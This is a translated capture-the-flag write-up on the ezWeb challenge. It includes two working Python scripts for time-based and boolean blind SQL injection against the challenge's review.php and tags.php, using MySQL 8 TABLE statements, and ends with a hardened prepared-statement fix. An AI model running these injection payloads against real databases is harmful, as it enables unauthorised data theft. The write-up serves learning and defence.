巅峰极客 (Peak Geek CTF)

I spent most of a month learning Java, and not a single Java challenge showed up in this contest (I wouldn't have solved one anyway).
This contest reminded me once again how much of a noob I am.
There was some big drama to watch this time too... I get the feeling that ichunqiu contests have far more py (answer-trading) than other platforms (personal impression; it might just be that there are more players). Every web challenge ends up with either 0-10 solves or 70-80+ solves, with nothing in between (most of the time). It was the same at 蓝帽杯 (Blue Hat Cup): halfway through the contest I realized I had forgotten to join the QQ group, and less than half a minute after joining, someone actually DMed me asking for web ideas? Of course I ignored them (I have no idea how a noob like me got noticed). So the platform spent half a day banning people, and the trading didn't decrease one bit (a scrub like me who can't solve anything has nothing to worry about XD).

ezWeb

After the contest someone found the original challenge: https://blog.maple3142.net/2022/08/01/uiuctf-2022-writeups/ . Even the pro version was reused with barely any changes.
At first I stared at it for ages; there was both Go and C in there, and my head went completely foggy, so I slept for two hours (I had pulled an all-nighter the night before). Then the pro version of the challenge was released, and the py file it came with had /review in it, so I went straight to auditing the review file.

$result = mysqli_query($link,"SELECT * FROM reviewqueue WHERE id >= $startID AND id <= $endID");

There is clearly no filtering here (apart from those few blacklisted words), yet no matter what I tried, I could not inject. After messing around for ages I found that review goes through the sites submitted via submit, and only when there is something sitting under review can you inject, and then only as a time-based blind. So first upload a few dozen URLs at submit so it can't get through them all, then do the blind injection. After that it's the classic MySQL 8 TABLE statement injection. Script:

import time
import requests

url = 'http://123.56.236.86:27349/review/review.php'
url2 = 'http://123.56.236.86:27349/submit/index.php'
# files = {"file": "123"}
# data = {"PHP_SESSION_UPLOAD_PROGRESS": "123"}
cookies = {"PHPSESSID": "503j4g2mvgobh8pq27b8oqup7p"}

result = ''
i = 1
while (1):
    for i in range(32, 128):
        temp = result + chr(i)
        payload = {
            "startid": '0/**/and/**/if(((binary\'flag{%s\')>((table/**/flag1))),sleep(0.5),0)--' % (temp),
            "endid": "123"}
        # print(temp)
        # the query only runs while the review queue is non-empty, so top it up
        res = requests.get(url).text
        if '0 pages queued in total' in res:
            data = {
                "url": "47.96.173.116",
                "worksafe": "on"
            }
            requests.post(url=url2, data=data, cookies=cookies)
        time1 = time.time()
        res = requests.post(url=url, cookies=cookies, data=payload).text
        # print(res)
        time2 = time.time()
        if time2 - time1 >= 0.5:
            # the guess sorted above the real value, so the previous char was right
            result = result + chr(i - 1)
            print(result)
            break
print('[*]Result ' + result)
#flag{ffbbe0b1-dde9-4c71-912e-91b2be0fdb2d}

flag2 can't be read here, because the SQL user is different. So I looked for the PHP files that connect to the database as the crawler user. And then the contest ended... I only got it working half an hour after the end XD. First, insert.php:

$title = str_replace("\'", "\'\'", $_POST['title']);
$title = str_replace("\"", "\"\"", $title);
if(preg_match("/select|or| |#/i",$title)){
    $error = 'Error fetching index: ' . 'i dont know ';
    include 'error.html.php';
    exit();
}

It looks bypassable, but when I tried \" the result was \"" and it somehow didn't get through; I was completely lost. Then only tags.php was left:

$url = mysqli_real_escape_string($link, $_POST['url']);
$status = "";

if( isset($_POST['tags']))
{
    $tags = mysqli_real_escape_string($link, $_POST['tags']);
    if($tags==""){
        $result = mysqli_query($link,'UPDATE windex SET tags = NULL WHERE url = "'.$url.'";');
    }
    else{
        if(preg_match("/select|or| |#/i",$url)){
            $error = 'Error fetching index: ' . 'i dont know ';
            include 'error.html.php';
            exit();
        }
        $result = mysqli_query($link,'UPDATE windex SET tags = "'.$tags.'" WHERE url = "'.$url.'";');
    }

Looking at mysqli_real_escape_string, it seems impossible to bypass, and yet, bizarrely, injection works; I don't really understand it... If you send a single double quote it errors out straight away, so what the hell is mysqli_real_escape_string even doing here? Then came a round of random trial and error, and I found that when both parameters are injected you get a boolean blind, but the sleep function doesn't work (or so I thought). I'll just paste a script.

import requests

url = 'http://123.56.236.86:27349/tags/tags.php'
cookies = {"PHPSESSID": "503j4g2mvgobh8pq27b8oqup7p"}

result = ''
i = 1
while (1):
    for i in range(32, 128):
        temp = result + chr(i)
        payload = {
            "tags": '2"/**/and/**/if(((binary\"%s\")>((table/**/flag2))),1,0)||"0' % (temp),
            "url": '"||"1'}
        # print(temp)
        res = requests.post(url=url, cookies=cookies, data=payload).text
        # print(res)
        # boolean oracle: the tags field in the response tells us which branch ran
        if '<input type="text" id="tags" name="tags" size="45" value="1">' in res:
            result = result + chr(i - 1)
            print(result)
            break
print('[*]Result ' + result)
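For reference, here is the hardened form of the two queries the writeup attacks (the id range in review.php and the UPDATE in tags.php), using mysqli prepared statements. This is an added example, not code from the challenge or from the original post; it assumes `$link` is the challenge's existing mysqli connection (with mysqlnd, for get_result()), and the table and column names are taken from the snippets above.

```php
<?php
// Added example (not the challenge's code): the same two queries with the
// values bound as parameters instead of concatenated into the SQL text.
// Assumes $link is the existing mysqli connection used by the challenge.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// review.php: startid/endid are integers, so validate them as integers and
// bind them as integers. A value such as
//   0/**/and/**/if((...),sleep(0.5),0)--
// fails FILTER_VALIDATE_INT and never reaches the query, which closes the
// time-based blind channel regardless of what is in the review queue.
function fetch_review_range(mysqli $link, $startRaw, $endRaw): array
{
    $startID = filter_var($startRaw, FILTER_VALIDATE_INT);
    $endID   = filter_var($endRaw, FILTER_VALIDATE_INT);
    if ($startID === false || $endID === false) {
        throw new InvalidArgumentException('startid/endid must be integers');
    }
    $stmt = $link->prepare('SELECT * FROM reviewqueue WHERE id >= ? AND id <= ?');
    $stmt->bind_param('ii', $startID, $endID);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);   // needs mysqlnd
}

// tags.php: string values are sent as bound parameters. The driver transmits
// them separately from the statement text, so a quote in tags or "||"1 in url
// is plain data; mysqli_real_escape_string and the keyword blacklist are no
// longer what the query's safety depends on.
function set_tags(mysqli $link, string $url, string $tags): int
{
    if ($tags === '') {
        $stmt = $link->prepare('UPDATE windex SET tags = NULL WHERE url = ?');
        $stmt->bind_param('s', $url);
    } else {
        $stmt = $link->prepare('UPDATE windex SET tags = ? WHERE url = ?');
        $stmt->bind_param('ss', $tags, $url);
    }
    $stmt->execute();
    return $stmt->affected_rows;
}
```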